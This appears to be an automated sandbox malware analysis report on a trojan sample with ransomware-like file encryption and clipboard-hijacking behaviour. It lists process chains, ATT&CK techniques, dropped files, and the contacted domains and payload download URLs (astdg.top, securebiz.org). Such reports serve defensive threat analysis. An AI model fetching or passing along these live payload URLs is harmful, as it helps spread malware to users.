                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeProcess created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --TaskJump to behavior
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeProcess created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,3_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,3_2_0043404A
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00438178
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00440116
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004382A2
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_0043834F
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00438423
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_004335E7
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: EnumSystemLocalesW,3_2_004387C8
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: GetLocaleInfoW,3_2_0043884E
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,3_2_00432B6D
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_00437BB3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: EnumSystemLocalesW,3_2_00437E27
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00437E83
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00437F00
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_0042BF17
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00437F83
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_0043404A
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,6_2_00438178
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_00440116
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004382A2
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_0043834F
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_00438423
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_004335E7
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: EnumSystemLocalesW,6_2_004387C8
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: GetLocaleInfoW,6_2_0043884E
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00427756 cpuid 3_2_00427756
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_0040628F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040628F
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_0042FE47
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,3_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,3_2_00419F90

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected Clipboard HijackerShow sources
                  Source: Yara matchFile source: 27.2.mstsca.exe.33e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.1.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.1.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.1.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.mstsca.exe.32a15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.1.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.1.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.1.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.build3.exe.34815a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.mstsca.exe.32615a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000001.353651937.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.284343753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.354158444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.354705969.00000000033E0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.297062571.0000000003260000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.500875294.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.282201078.0000000003480000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000001.473467293.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.473853443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000001.295994218.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.474082718.00000000032A0000.00000040.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                  Default AccountsCommand and Scripting Interpreter3Scheduled Task/Job1Application Shimming1Obfuscated Files or Information3LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Process Injection211Software Packing13Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Services File Permissions Weakness1Scheduled Task/Job1Masquerading1NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion21LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonServices File Permissions Weakness1Process Injection211Cached Domain CredentialsSecurity Software Discovery151VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsServices File Permissions Weakness1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                  Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 473798 Sample: Ln0LqSBLhS.exe Startdate: 30/08/2021 Architecture: WINDOWS Score: 100 79 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->79 81 Multi AV Scanner detection for domain / URL 2->81 83 Antivirus detection for URL or domain 2->83 85 6 other signatures 2->85 12 Ln0LqSBLhS.exe 2->12         started        15 Ln0LqSBLhS.exe 2->15         started        17 mstsca.exe 2->17         started        19 2 other processes 2->19 process3 signatures4 87 Detected unpacking (changes PE section rights) 12->87 89 Contains functionality to inject code into remote processes 12->89 91 Writes many files with high entropy 12->91 21 Ln0LqSBLhS.exe 1 16 12->21         started        93 Injects a PE file into a foreign processes 15->93 25 Ln0LqSBLhS.exe 12 15->25         started        27 mstsca.exe 17->27         started        29 mstsca.exe 19->29         started        31 mstsca.exe 19->31         started        process5 dnsIp6 69 api.2ip.ua 77.123.139.190, 443, 49708, 49709 VOLIA-ASUA Ukraine 21->69 59 C:\Users\...\Ln0LqSBLhS.exe:Zone.Identifier, ASCII 21->59 dropped 33 Ln0LqSBLhS.exe 21->33         started        36 icacls.exe 21->36         started        38 conhost.exe 21->38         started        40 schtasks.exe 27->40         started        file7 process8 signatures9 77 Injects a PE file into a foreign processes 33->77 42 Ln0LqSBLhS.exe 1 24 33->42         started        process10 dnsIp11 71 astdg.top 94.190.187.102, 49711, 49716, 80 TCV-ASBG Bulgaria 42->71 73 securebiz.org 203.228.9.102, 49710, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 42->73 75 2 other IPs or domains 42->75 61 C:\Users\user\AppData\Local\...\build3.exe, PE32 42->61 dropped 63 C:\Users\user\AppData\Local\...\Settings.ft, COM 42->63 dropped 65 C:\Users\user\AppData\Local\...\js[1].js, DOS 42->65 dropped 67 353 other files (333 malicious) 42->67 dropped 95 Modifies existing user documents (likely ransomware behavior) 42->95 47 build3.exe 42->47         started        file12 signatures13 process14 signatures15 97 Detected unpacking (changes PE section rights) 47->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 47->99 50 build3.exe 1 47->50         started        process16 file17 57 C:\Users\user\AppData\Roaming\...\mstsca.exe, PE32 50->57 dropped 53 schtasks.exe 50->53         started        process18 process19 55 conhost.exe 53->55         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Ln0LqSBLhS.exe42%VirustotalBrowse
                  Ln0LqSBLhS.exe21%MetadefenderBrowse
                  Ln0LqSBLhS.exe59%ReversingLabsWin32.Trojan.Glupteba
                  Ln0LqSBLhS.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  3.1.Ln0LqSBLhS.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
                  3.2.Ln0LqSBLhS.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
                  23.1.mstsca.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                  32.2.mstsca.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                  28.1.mstsca.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                  32.1.mstsca.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                  12.2.build3.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                  6.2.Ln0LqSBLhS.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
                  6.1.Ln0LqSBLhS.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
                  9.1.Ln0LqSBLhS.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
                  9.2.Ln0LqSBLhS.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
                  28.2.mstsca.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                  23.2.mstsca.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://astdg.top/files/1/build3.exe$run0%Avira URL Cloudsafe
                  http://astdg.top/files/1/build3.exe21%VirustotalBrowse
                  http://astdg.top/files/1/build3.exe0%Avira URL Cloudsafe
                  https://we.tl/t-VCW326HO0%Avira URL Cloudsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://securebiz.org/dl/build2.exe$run100%Avira URL Cloudmalware
                  https://www.google.com;0%Avira URL Cloudsafe
                  https://www.google.%/ads/ga-audiences0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSADomainV0%Avira URL Cloudsafe
                  https://www.microsoftedgeinsider.com0%URL Reputationsafe
                  http://securebiz.org/dl/build2.exe100%Avira URL Cloudmalware
                  https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
                  http://securebiz.org/dl/build2.exerun100%Avira URL Cloudmalware
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://crl.como0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  astdg.top
                  		94.190.187.102
                  		truefalse
                    		high
                    securebiz.org
                    		203.228.9.102
                    		truefalse
                      		high
                      api.2ip.ua
                      		77.123.139.190
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://astdg.top/files/1/build3.exetrue
                        • 21%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://securebiz.org/dl/build2.exetrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://outlook.live.com/owa/Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                          		high
                          http://searchads.msn.net/.cfm?&&kp=1&Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpfalse
                            		high
                            https://adservice.google.com/ddm/fls/z/src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpfalse
                              		high
                              https://apis.google.com/js/client.jsLn0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpfalse
                                		high
                                http://astdg.top/files/1/build3.exe$runLn0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/favicon.ico~Ln0LqSBLhS.exe, 00000006.00000003.277558843.0000000002F30000.00000004.00000001.sdmpfalse
                                  		high
                                  https://crash.corp.google.com/samples?reportid=&q=Ln0LqSBLhS.exe, 00000006.00000003.306799750.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306518235.0000000002F30000.00000004.00000001.sdmpfalse
                                    		high
                                    https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=79d8737dc86cbccc6833c6f82a6aLn0LqSBLhS.exe, 00000006.00000003.277923079.0000000002F30000.00000004.00000001.sdmpfalse
                                      		high
                                      https://ampcid.google.com/v1/publisher:getClientIdLn0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpfalse
                                        		high
                                        https://mail.google.com/mail/#settingsLn0LqSBLhS.exe, 00000006.00000003.306327466.0000000002F30000.00000004.00000001.sdmpfalse
                                          		high
                                          https://docs.google.com/Ln0LqSBLhS.exe, 00000006.00000003.306008578.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpfalse
                                            		high
